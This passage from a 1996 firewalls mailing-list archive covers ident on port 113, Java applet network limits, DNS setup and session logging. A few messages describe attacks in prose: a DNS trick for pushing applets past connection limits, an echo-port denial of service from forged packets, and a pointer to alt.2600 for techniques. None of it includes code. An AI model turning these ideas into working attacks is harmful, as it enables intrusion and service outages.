attempts to open a socket to 'firewall.your.com' and it fails... because the socket class that is available via netscape only permits it to connect to the host designated in the above URL. if you can use IP spoofing to change the URL listing in the "Location:" box of a browser.. i'd be fairly impressed. after think about it a bit more than i really wanted to.. i dont see how an applet can get around only being able to connect to www.foo.com. jeff From firewalls-owner Fri Feb 9 12:54:16 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA21167 for firewalls-outgoing; Fri, 9 Feb 1996 10:04:49 -0800 (PST) Received: from mailer.mda.ca (mailer.mda.ca [142.73.130.252]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA21153 for ; Fri, 9 Feb 1996 10:04:40 -0800 (PST) Received: from conan.mda.ca by mailer.mda.ca; (5.65v3.2/1.1.8.2/06Oct95-0117PM) id AA08318; Fri, 9 Feb 1996 10:03:51 -0800 Received: from localhost.mda.ca by conan.mda.ca via SMTP (931110.SGI/931108.SGI.ANONFTP) for @mailhost.mda.ca:firewalls@greatcircle.com id AA19590; Fri, 9 Feb 96 10:03:25 -0800 Message-Id: <9602091803.AA19590@conan.mda.ca> X-Mailer: exmh version 1.6.5 12/11/95 To: Jim Legg Subject: Re: port 113? In-Reply-To: legg's message of Fri, 09 Feb 1996 11:36:03 +0500. <9602091636.AA25002@sun1plus.liebert.com> Cc: firewalls@greatcircle.com Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Fri, 09 Feb 1996 10:03:17 -0800 From: Ed Osterman Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ---------------------------------------------------------------------------- Jim Legg writes: > Hi, > > I noticed in my log files the following (just a snippet): > > 2/9-10:42:07-81 tcp 199.18.25.195/3054 -> 206.214.232.100/www 44 syn > When this web site (nslookup returns Facade.COM) is accessed it tries to come > back to your system on port 113. What is this port? (It's not listed in my > /etc/services) > > Thanks. > > -jim- > When you send mail to someone, they are entitled to do a reverse query to validate your address, etc. That validation occurs via port 113, using the auth or ident daemons. See RFCs 931 and 1413. Lots of sites block this service because authentication is not manadatory and the mail will be sent anyways. regards, -- Ed Osterman eo@mda.ca From firewalls-owner Fri Feb 9 13:09:10 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA28050 for firewalls-outgoing; Fri, 9 Feb 1996 12:25:23 -0800 (PST) Received: from uuneo.neosoft.com (uuneo.neosoft.com [206.109.1.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id MAA28027 for ; Fri, 9 Feb 1996 12:25:11 -0800 (PST) Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.7.3/8.7.3) with UUCP id OAA15481 for GreatCircle.COM!firewalls; Fri, 9 Feb 1996 14:11:33 -0600 (CST) Received: by ris1.nmti.com (smail2.5) id AA26182; 9 Feb 96 14:06:20 CST (Fri) Received: by sonic.nmti.com; id AA28623; Fri, 9 Feb 1996 13:36:44 -0600 From: peter@nmti.com (Peter da Silva) Message-Id: <9602091936.AA28623@sonic.nmti.com.nmti.com> Subject: Re: Product selection To: jon@london.hcsc.com (Jon Shallow) Date: Fri, 9 Feb 1996 13:36:44 -0600 (CST) Cc: peter@nmti.com, jon@london.hcsc.com, firewalls@GreatCircle.COM In-Reply-To: <9602091727.AA12653@london.csd.harris.com> from "Jon Shallow" at Feb 9, 96 05:27:39 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Depends on how the firewall is set up. A firewall worth its salt these > days will have both dynamic (state driven ) packet filtering and proxies. > The proxy could try to establish another TCP connection, but this > connection would have to be permitted by the packet filtering. And what about a proxy that's *expected* to open TCP connections, for example an SMTP proxy? No, he couldn't attach to port 23, but odds are there's opportunities on port 25 somewhere. From firewalls-owner Fri Feb 9 13:28:58 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA29068 for firewalls-outgoing; Fri, 9 Feb 1996 12:44:16 -0800 (PST) Received: from Disclosure.COM (di2.disclosure.com [205.156.194.11]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id MAA29061 for ; Fri, 9 Feb 1996 12:44:08 -0800 (PST) Received: by Disclosure.COM (4.1/SMI-4.1) id AA27011; Fri, 9 Feb 96 15:46:44 EST Date: Fri, 9 Feb 1996 15:46:43 -0500 (EST) From: Scott Barman To: "Douglas M. Todd, Jr." Cc: Firewalls@GreatCircle.COM Subject: Re: Would anyone know how to route www.foobar.COM In-Reply-To: <311B939B.32FC@fc.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 9 Feb 1996, Douglas M. Todd, Jr. wrote: > to foobar.com on an DNS server? Where in the named file & what format > is it in? Look in your named.boot for the name of the file that is the primary for your domain, this may look like: primary foobar.com db.foobar If this is the case, then add the following in db.foobar: www.foobar.com. IN CNAME foobar.com. Good luck. scott barman -- scott barman DISCLAIMER: I speak to anyone who will listen, scott@disclosure.com and I speak only for myself. barman@ix.netcom.com "Micro$oft and Windoze/NT will be the cause of the de-evolution of network security just as the original PC and BASIC was the cause of the de-evolution of programming." - scott barman From firewalls-owner Fri Feb 9 13:30:36 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA28173 for firewalls-outgoing; Fri, 9 Feb 1996 12:27:24 -0800 (PST) Received: from mail.Clark.Net (mail.clark.net [168.143.0.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id MAA28165; Fri, 9 Feb 1996 12:27:13 -0800 (PST) Received: from clark.net (mjr@clark.net [168.143.0.7]) by mail.Clark.Net (8.7.3/8.6.5) with ESMTP id PAA23036; Fri, 9 Feb 1996 15:26:25 -0500 (EST) From: "Marcus J. Ranum" Received: (from mjr@localhost) by clark.net (8.7.1/8.7.1) id PAA15612; Fri, 9 Feb 1996 15:26:12 -0500 (EST) Message-Id: <199602092026.PAA15612@clark.net> Subject: Ultimately secure firewall -- To: firewalls@GreatCircle.COM Date: Fri, 9 Feb 1996 15:26:06 -0500 (EST) Cc: firewalls-digest@GreatCircle.COM In-Reply-To: <199602081703.JAA02123@miles.greatcircle.com> from "owner-firewalls-digest@uunet.uu.net" at Feb 8, 96 09:03:09 am Reply-To: mjr@v-one.com Organization: V-One Corporation, Baltimore, MD Office Phone: 410-889-8569 X-Mailer: ELM [version 2.4 PL24alpha3] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Mark Newton writes: > >I have a need to point out some network security problems to an >acquaintance, and thought it'd be effective if I illustrated some >of them my pointing him at "The ULTIMATELY secure firewall" page The Ultimate firewall page has moved to http://www.v-one.com/pubs along with most of my other stuff. I've actually been considering pricing the cost of a case or 2 of cheap wire-clippers with custom silk-screened handles reading "Ultimate Firewall" :) mjr. From firewalls-owner Fri Feb 9 13:32:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA29117 for firewalls-outgoing; Fri, 9 Feb 1996 12:44:42 -0800 (PST) Received: from server.iadfw.net (server.iadfw.net [204.178.72.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id MAA29079 for ; Fri, 9 Feb 1996 12:44:24 -0800 (PST) Received: from [206.66.11.145] (dal05-15.ppp.iadfw.net [206.66.11.145]) by server.iadfw.net (8.7/8.7) with SMTP id OAA27469; Fri, 9 Feb 1996 14:41:32 -0600 (CST) Message-Id: <199602092041.OAA27469@server.iadfw.net> To: A Padgett Peterson , Danny Boulet , exceed , firewalls , Gordon Rowell , "Walter F. Inetman" Subject: New Encryption SDoftware Technology Available Date: Fri, 09 Feb 96 14:45:30 -0500 From: Walter Chek X-Mailer: E-Mail Connection v2.5.03 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk -- [ From: Walter Chek * EMC.Ver #2.5.02 ] -- Press Release from Antelope Productions February 7, 1996 Subject: New Encryption Software; Quick@Crypt Antelope Productions, Inc. is releasing our new encryption package called Quick@Crypt that has several advantages over any other encryption software available on the market. Now more than ever, there is a need for security in transferring sensitive information through the Internet and networks worldwide. There has not been a universal way for people to send all types of files easily, inexpensively and securely through the Internet or networks UNTIL NOW. All other encryption software available on the market requires a separate license for each site (the sender as well as the receiver). With Quick@Crypt you may freely distribute the decryption program. Only the encryption side requires a licensed copy of Quick@Crypt. There is also no limit on the password size and there is no restriction on overseas use. You will find pricing of Quick@Crypt a real bargain, given the pricing and functionality compared to other available encryption packages. Our price is only $99.95 plus $5 shipping in US plus state sales tax in Texas, New Jersey and Florida. Quantity discounts are also available. Installation is performed easily on any Windows or Windows 95 system. Memory requirements with as little of 2 MB of RAM (I tried it on a Tandy portable with 2 MB!). We also have a version to work in DOS. There is a floating toolbar that always remains on top of your current open window. Quick@Crypt's floating toolbar gives you four options. 1. Encryption-You have a user friendly screen to select the drive, directory and files that you want to encrypt. Chosen files for encryption are grouped together and compiled into a single executable file with an assigned password you enter. There is no limitation on the password size. Overseas distribution of the encrypted files is not restricted. File encryption often takes less then ten seconds. 2. Decryption- Allows you to select the drive, directory and file you want to decrypt. The password is requested once you select the encrypted file. Decryption is performed in Windows or Windows 95 with the freely distributed decryption module. Decryption module is sent to each receiver with no licensing requirement. Decryption of the executable file may also be performed at the DOS prompt with no additional software. 3. Help- A user friendly system for all of Quick@Crypt's functions, along with an index and glossary. 4. Exit For more information, wholesale quotations, or ordering, you can call 1-800 -270-7033 or 1-800-356-4831. You can also call Walter Chek at 214-252-1318. From firewalls-owner Fri Feb 9 13:56:49 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA02777 for firewalls-outgoing; Fri, 9 Feb 1996 13:45:36 -0800 (PST) Received: from raptor.racal.com (rdgw.racal.com [205.138.43.50]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id NAA02772 for ; Fri, 9 Feb 1996 13:45:29 -0800 (PST) Received: from usa.racal.com (usa.racal.com [130.45.201.229]) by raptor.racal.com (8.7.1/8.7.1) with SMTP id QAA18458 for ; Fri, 9 Feb 1996 16:45:18 -0500 (EST) Received: from cc:Mail by usa.racal.com id AA823912856; Fri, 09 Feb 96 15:59:10 EST Date: Fri, 09 Feb 96 15:59:10 EST From: "john welby" Message-Id: <9601098239.AA823912856@usa.racal.com> To: firewalls@greatcircle.com Subject: Subscription Request Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Subscription Request to majordomo@greatcircle.com j_welby@usa.racal.com From firewalls-owner Fri Feb 9 14:42:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA04063 for firewalls-outgoing; Fri, 9 Feb 1996 14:07:12 -0800 (PST) Received: from gatekeeper.Bridge.COM (gatekeeper.bridge.com [167.76.159.11]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA04053 for ; Fri, 9 Feb 1996 14:07:04 -0800 (PST) Received: (from mailproxy@localhost) by gatekeeper.Bridge.COM (8.6.12/8.6.9) id PAA24495; Fri, 9 Feb 1996 15:59:07 -0600 Received: from ignatz.bridge.com(167.76.24.6) by gatekeeper.Bridge.COM via smap (V1.0mjr) id sma024481; Fri Feb 9 15:59:02 1996 Received: from ernie.bridge.com by ignatz.bridge.com with SMTP id AA11629 (5.67b/IDA-1.5); Fri, 9 Feb 1996 16:13:11 -0600 Date: Fri, 9 Feb 1996 16:13:11 -0600 From: Ken Hardy Message-Id: <199602092213.AA11629@ignatz.bridge.com> To: frankw@in.net, Dick_Wall@stratus.com Subject: Re: Non-company Access ?? Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In addition to some of the precautions already mentioned, on the rare occasions that I've had to allow outside access, I've logged _all_ the traffic involved (packet contents as well as headers) to a file on a third machine running tcpdump or snoop. The captured sessions get archived indefinitely, too. - KH From firewalls-owner Fri Feb 9 14:51:05 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA05558 for firewalls-outgoing; Fri, 9 Feb 1996 14:33:45 -0800 (PST) Received: from reach.com (reach.com [199.29.96.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA05542 for ; Fri, 9 Feb 1996 14:33:38 -0800 (PST) Received: from ad0.reach.com ([192.9.208.9]) by reach.com (4.1/SMI-4.1) id AA13107; Fri, 9 Feb 96 17:31:17 EST Date: Fri, 9 Feb 96 17:34:12 EST From: dgameynn@colybrand.com (David Gamey -- ITAS - Toronto ) Received: by ad0.reach.com (4.1/3.2.083191-Reach Networks) id AA14254; Fri, 9 Feb 96 17:34:12 EST Message-Id: <9602092234.AA14254@ad0.reach.com> To: Firewalls@greatcircle.com Subject: Strange Digests? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk To: Firewalls@greatcircle.com Inet I've been subscribed to the digest for quite a while now. Lately, as in since mid-Dec, I've noticed something unusual in the e-mail messages. I seem to be getting digest positings from different sources: 1. The mail app normally reports digests as being from "owner Internet" occassionally reports the sender as "digest Internet" (It tends to truncates the sender and appends Internet). 2. The digest is incorrectly identified, usually as V01N001, e.g. most recently this occurred on Thursday, Feb. 8 3. I see case changes in the title line, i.e. firewalls-digest instead of Firewalls-digest I'm don't think this problem lies with my online service, despite their peculiar gateway, and I suspect others are finding the same thing. Again, unfortunately, I can't tell much about whats going as most of the useful features that would tell me have been left out of the mail client. Sorry for the digression. David From firewalls-owner Fri Feb 9 14:54:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA05928 for firewalls-outgoing; Fri, 9 Feb 1996 14:40:28 -0800 (PST) Received: from uuneo.neosoft.com (uuneo.neosoft.com [206.109.1.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id OAA05922 for ; Fri, 9 Feb 1996 14:40:23 -0800 (PST) Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.7.3/8.7.3) with UUCP id QAA27983 for GreatCircle.COM!firewalls; Fri, 9 Feb 1996 16:30:02 -0600 (CST) Received: by ris1.nmti.com (smail2.5) id AA29450; 9 Feb 96 16:11:49 CST (Fri) Received: by sonic.nmti.com; id AA09982; Fri, 9 Feb 1996 15:42:31 -0600 From: peter@nmti.com (Peter da Silva) Message-Id: <9602092142.AA09982@sonic.nmti.com.nmti.com> Subject: Re: JAVA security problem ? To: jcmurphy@smurfland.cit.buffalo.edu (Jeff Murphy) Date: Fri, 9 Feb 1996 15:42:30 -0600 (CST) Cc: proberts@clark.net, ken@bridge.com, firewalls@GreatCircle.COM In-Reply-To: <199602091940.OAA16654@smurfland.cit.buffalo.edu> from "Jeff Murphy" at Feb 9, 96 02:40:40 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > note: i'm not a java proponent. i'm really only 'play' with it from time to > time. but the statements like the following are so vague and general. many > people say "ohmygawd.. executing code! it's badbadbad!" but never state > in what ways it is bad. Last time I found a hole the folks at Sun were very good about patching it up, but it *does* depend on some rather new technology for the basic security mechanism. From firewalls-owner Fri Feb 9 14:57:40 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA06281 for firewalls-outgoing; Fri, 9 Feb 1996 14:45:15 -0800 (PST) Received: from nsco.network.com (nsco.network.com [129.191.1.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA06233; Fri, 9 Feb 1996 14:44:50 -0800 (PST) Received: from mnbp.network.com (ushub.network.com) by nsco.network.com (4.1/1.34) id AA26512; Fri, 9 Feb 96 16:45:55 CST Received: by mnbp.network.com with Microsoft Mail id <311BCD79@mnbp.network.com>; Fri, 09 Feb 96 16:40:57 CST From: Michael Brown To: firewalls-owner , Firewall ListServer Subject: RE: NetWare LAN Security using IP-IPX Gateway Date: Fri, 09 Feb 96 16:36:00 CST Message-Id: <311BCD79@mnbp.network.com> X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk check out alt.2600 go to www.yahoo.com and search on 2600 you should pick up a lot of different techniques by watching it for a few days. ---------- From: firewalls-owner To: Firewall ListServer Subject: NetWare LAN Security using IP-IPX Gateway Date: Friday, February 09, 1996 12:41PM I am new to the entire subject of firewalls and am looking for comments on the relative security of IPX-based assets on an IPX only LAN which is connected to an IP network (Internet mainly) via an IP-IPX gateway. Is there a way to access the IPX-based assets from the IP side and do harm? If so, how (either theory or actual methods) and can the risk be further mitigated? This information will be used to assist us in determining the relative risks. Thanks for your time. -Eliot -- Eliot T. Ware, CNE voice: (202) 622-1302 Global Systems Architect fax: (202) 622-2582 Department of the Treasury (UNIBAND) preferred: etware@access.digex.net alternate: eliot.ware@treas.sprint.com From firewalls-owner Fri Feb 9 14:59:18 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA04591 for firewalls-outgoing; Fri, 9 Feb 1996 14:17:07 -0800 (PST) Received: from insosf1.netins.net (insosf1.netins.net [167.142.225.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA04582 for ; Fri, 9 Feb 1996 14:16:58 -0800 (PST) Received: (from kcrg@localhost) by insosf1.netins.net id QAA02365; Fri, 9 Feb 1996 16:16:02 -0600 Received: from picayune.crgazette.com by kcrg.com with SMTP id AA10856 (5.67b/IDA-1.5); Fri, 9 Feb 1996 16:15:10 -0600 Date: Fri, 9 Feb 1996 16:15:08 -0600 (CST) From: Jeff Fisher X-Sender: jeff@picayune.crgazette.com To: Jim Legg Cc: firewalls@GreatCircle.COM Subject: Re: port 113? In-Reply-To: <9602091636.AA25002@sun1plus.liebert.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- On Fri, 9 Feb 1996, Jim Legg wrote: > Hi, > > I noticed in my log files the following (just a snippet): > > 2/9-10:42:07-81 tcp 199.18.25.195/3054 -> 206.214.232.100/www 44 syn > > When this web site (nslookup returns Facade.COM) is accessed it tries to come > back to your system on port 113. What is this port? (It's not listed in my > /etc/services) > On my system (Linux) /etc/services says this: auth 113/tcp tap ident authentication and from /etc/inetd.conf: # Ident service is used for net authentication auth stream tcp nowait root /usr/sbin/in.identd in.identd The man page references RFC 1413 if you want to do some more reading, or I can e-mail the man page from my system. - - ------ Jeff Fisher Gazette MIS jeff@kcrg.com Cedar Rapids, IA, US -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMRvHY+tNvqLoDn1tAQHMnAQAnG7LV4jSfKxtJv5kPTsiRQhJJA9zj1jZ txfAdJS7hBDFNdONsZKQzptzYozqDqYvN2nw2IEpK9FiCbBlCcdH/UhRkVTZG2cO +OZvLYHBbeXfuqufc9OczlgFDdTASMCm6CK12VfU42F+6QA8r3Hz9A4KMqCjQE/y beQizZ0ohAk= =7nue -----END PGP SIGNATURE----- From firewalls-owner Fri Feb 9 17:46:47 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id RAA14413 for firewalls-outgoing; Fri, 9 Feb 1996 17:23:13 -0800 (PST) Received: from mark.allyn.com (mark.allyn.com [198.202.30.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id RAA14408 for ; Fri, 9 Feb 1996 17:23:09 -0800 (PST) Received: (from allyn@localhost) by mark.allyn.com (8.7/8.7) id RAA25941; Fri, 9 Feb 1996 17:25:36 -0800 (PST) From: Mark Allyn (206) 860-9454 Message-Id: <199602100125.RAA25941@mark.allyn.com> Subject: Re: Non-company Access ?? To: ken@bridge.com (Ken Hardy) Date: Fri, 9 Feb 1996 17:25:36 -0800 (PST) Cc: frankw@in.net, Dick_Wall@stratus.com, firewalls@GreatCircle.COM In-Reply-To: <199602092213.AA11629@ignatz.bridge.com> from "Ken Hardy" at Feb 9, 96 04:13:11 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello! This can get mightly unwieldy. Where are you going to keep those gigabytes of data? I tried extensive loggin before, but I bagged it. Disk space is not that cheap yet. About the only thing I could suggest, if your company is as big as mine (Boeing), is to take all of the surplus PC's and rip out their hard disks and install them one at a time in your logging machine, let them fill up, and stash them away. Then pray that the rate that these suckers fill up is slower than the rate that your company surpluses old equipment. Good Luck! From firewalls-owner Fri Feb 9 22:24:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id WAA25267 for firewalls-outgoing; Fri, 9 Feb 1996 22:22:26 -0800 (PST) Received: from gxl.woodtech.com (gxl.woodtech.com [204.248.87.4]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id WAA25262 for ; Fri, 9 Feb 1996 22:22:22 -0800 (PST) Received: (from joey@localhost) by gxl.woodtech.com (8.6.12/8.6.12) id AAA12862; Sat, 10 Feb 1996 00:27:26 -0600 Date: Sat, 10 Feb 1996 00:27:25 -0600 (CST) From: "Joe Smith (Really!)" To: Greg Woods cc: Michael Baumann , jason@OiT.co.uk, brian@ilinx.bctel.net, brian_murrell@bctel.net, firewalls@GreatCircle.COM Subject: Re: anybody know of any vulnerabilities with "echo" In-Reply-To: <199602090250.TAA08588@ncar.ucar.EDU> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk What is the loss of disabling echo? Or discard for that matter. On Thu, 8 Feb 1996, Greg Woods wrote: > On Thu, 8 Feb 1996, Jason L. Haar wrote: > > > > > >I'm wondering if a new vulnerablity with the (a particular implementation > > maybe) echo server has been found. Anybody else notice this trend?? > > There's a CERT advisory out; forged packets that appear to come from the > echo port of one host are sent to the echo port of another, causing the > echo servers to bombard one another. This will hose both machines > and the net between them, a very effective denial of service attack. > > --Greg > From firewalls-owner Fri Feb 9 22:39:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id WAA26234 for firewalls-outgoing; Fri, 9 Feb 1996 22:34:43 -0800 (PST) Received: from WYVERN.AZTECH.NET (AZTech.Net [198.182.221.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id WAA26191 for ; Fri, 9 Feb 1996 22:34:19 -0800 (PST) Received: by aztech.net (MX V4.0-1 VAX) id 266; Fri, 09 Feb 1996 23:29:07 -700 Date: Fri, 09 Feb 1996 23:29:04 -700 From: Steve Gibbons To: FIREWALLS@GREATCIRCLE.COM CC: _steve@aztech.net Message-ID: <0099DACE.DD817F60.266@aztech.net> Subject: Re: JAVA security problem ? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Various people have posted to this list recently, some of whom asked how Java might be compromised. Enclosed is a message that I sent to one of the Java Developers/Maintainers a few days back. I fully admit that this is unverified and poorly explained, but it's my first stab at the problem and I don't have a machine that will run Java applets... (VMS, ULTRIX, and Macintosh here.) I have not yet received a response (FWIW.) -- Begin Forwarded Message -- Jim, In Article: <199602072346.PAA02314@mile.Eng.Sun.COM>, hagen@scndprsn.Eng.Sun.COM (Hagen) wrote: # Thank you for your bug report. # For many reasons, I would like to ask if you could submit a working # example of this problem. Usually I don't go off half-cocked, but in this case I don't have the necessary resources to provide a working exploit. # Based on the bug report you've submitted I'm unsure where to start or # exactly what the 'coercion' would be. If you can submit a detailed # description of this problem, I would be very interested in exploring it # further, but a coded example from you would likely be the most # expedient method to determine the answer to your question. The applet itself would probably look very similar to the one at http://www.javasoft.com/sfaq/example/sendTest.java whith changes to how the variable 'in' gets assigned a value, or (maybe) to the new DatagramPacket call so that packets are sent to in[1] instead of in[0]. Assume the person instigating the attack has a machine that is running both an HTTP server and a DNS server. Normally, this machine is accessed from the outside as www.foo.com, and DNS behaves normally. When, for example the DNS server receives a request to supply address RRs for trigger.foo.com it does something else, it looks at where the request came from and constructs a response with multiple address RRs - the first of which is www.foo.coms real address and the rest of which are addresses within victim.bar.com's network (for example) Assume that the HTTP server is similarly jimmied so that when it serves a particular file it can modify it to suit the target. (I'm not certain that this is necessary.) This should be testable without hacking on server code by configuring www.foo.com with one A RR, trigger.foo.com with two A RRs (the first of which is the same as that of www.foo.com, the second of which is the target) and then creating an applet that can connect to any interface of a multi-homed host. # Again, thank you very much for your help, I hope that it did help, and that my explanation was clear enough. If I could run applets on any of my machines, I'd take a stab at it myself. Again, this is pureley a WAG on my part, and I hope that I haven't wasted your time. # _____Begin Bug Report_____ # Greetings, # I beleive that it might be possible to coerce a downloaded applet into making # TCP/IP connections to machines other than the serving site. It's my # understanding that such connections are supposed to be disallowed. # I don't have proof that this is the case, but my gut feeling based on looking # at your API guides and years of programming tells me that this is so. # The exploit requires control of a DNS server and changing the response to name # to address queries on the fly. # Feel free to contact me if you need more details. # I would appreciate knowing whether my suspicion is correct (or not.) # -- # Steve@AZTech.Net # +1 602 504 2246 (days) # +1 602 867 8777 (home) -- Steve@AZTech.Net From firewalls-owner Fri Feb 9 23:39:19 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id XAA29162 for firewalls-outgoing; Fri, 9 Feb 1996 23:26:49 -0800 (PST) Received: from mcfeely.bsfs.org (mcfeely.bsfs.org [204.91.13.34]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id XAA29157 for ; Fri, 9 Feb 1996 23:26:45 -0800 (PST) Received: (from wombat@localhost) by mcfeely.bsfs.org (8.6.12/8.6.12) id CAA16624; Sat, 10 Feb 1996 02:23:18 -0500 Date: Sat, 10 Feb 1996 02:23:14 -0500 (EST) From: Rabid Wombat To: "Mark Allyn (206) 860-9454" cc: Ken Hardy , frankw@in.net, Dick_Wall@stratus.com, firewalls@GreatCircle.COM Subject: Re: Non-company Access ?? In-Reply-To: <199602100125.RAA25941@mark.allyn.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Just leave a week/month (whatever you have room for) on line, and back it up to tape with your daily backups. You can always restore the old log file from tape if you have the need. ---------------------------------------- Rabid Wombat wombat@mcfeely.bsfs.org ---------------------------------------- On Fri, 9 Feb 1996, Mark Allyn (206) 860-9454 wrote: > Hello! > > This can get mightly unwieldy. Where are you going to keep those > gigabytes of data? > > I tried extensive loggin before, but I bagged it. Disk space is > not that cheap yet. > > About the only thing I could suggest, if your company is as big > as mine (Boeing), is to take all of the surplus PC's and rip out > their hard disks and install them one at a time in your logging machine, > let them fill up, and stash them away. Then pray that the rate that > these suckers fill up is slower than the rate that your company > surpluses old equipment. > > Good Luck! > > From firewalls-owner Sat Feb 10 01:24:12 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id AAA02554 for firewalls-outgoing; Sat, 10 Feb 1996 00:59:50 -0800 (PST) Received: from hawk.hcsc.com (hawk.hcsc.com [204.5.22.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id AAA02546 for ; Sat, 10 Feb 1996 00:59:44 -0800 (PST) Received: from london.hcsc.com by hawk.hcsc.com (5.61/harris-5.1) id AA10386; Sat, 10 Feb 96 03:58:58 -0500 Received: by london.csd.harris.com (5.61/HARRIS-4.0) id AA15194; Sat, 10 Feb 96 08:59:00 GMT From: jon@london.hcsc.com (Jon Shallow) Message-Id: <9602100859.AA15194@london.csd.harris.com> Subject: Re: Product selection To: peter@nmti.com Date: Sat, 10 Feb 96 8:58:59 GMT Cc: firewalls@GreatCircle.com In-Reply-To: <9602091936.AA28623@sonic.nmti.com.nmti.com>; from "Peter da Silva" at Feb 9, 96 1:36 pm X-Mailer: ELM [version 2.2 PL10] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > >From firewalls-owner Sat Feb 10 02:09:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id CAA06823 for firewalls-outgoing; Sat, 10 Feb 1996 02:04:12 -0800 (PST) Received: from icicle.winternet.com (icicle.winternet.com [198.174.169.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id CAA06818 for ; Sat, 10 Feb 1996 02:04:02 -0800 (PST) Received: from parka (dufresne@parka.winternet.com [198.174.169.9]) by icicle.winternet.com (8.7.3/8.7.2) with ESMTP id EAA10620; Sat, 10 Feb 1996 04:03:16 -0600 (CST) Received: (from dufresne@localhost) by parka (8.6.12/8.6.12) id EAA14104; Sat, 10 Feb 1996 04:03:15 -0600 Posted-Date: Sat, 10 Feb 1996 04:03:15 -0600 Date: Sat, 10 Feb 1996 04:03:14 -0600 (CST) From: Ron DuFresne To: Jim Legg cc: firewalls@GreatCircle.COM Subject: Re: port 113? In-Reply-To: <9602091636.AA25002@sun1plus.liebert.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 9 Feb 1996, Jim Legg wrote: > Hi, > > I noticed in my log files the following (just a snippet): > > 2/9-10:42:07-81 tcp 199.18.25.195/3054 -> 206.214.232.100/www 44 syn > 2/9-10:42:08-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64) > 2/9-10:42:11-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64) > 2/9-10:42:17-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64) > 2/9-10:42:29-81 tcp 199.18.25.195/113 <- 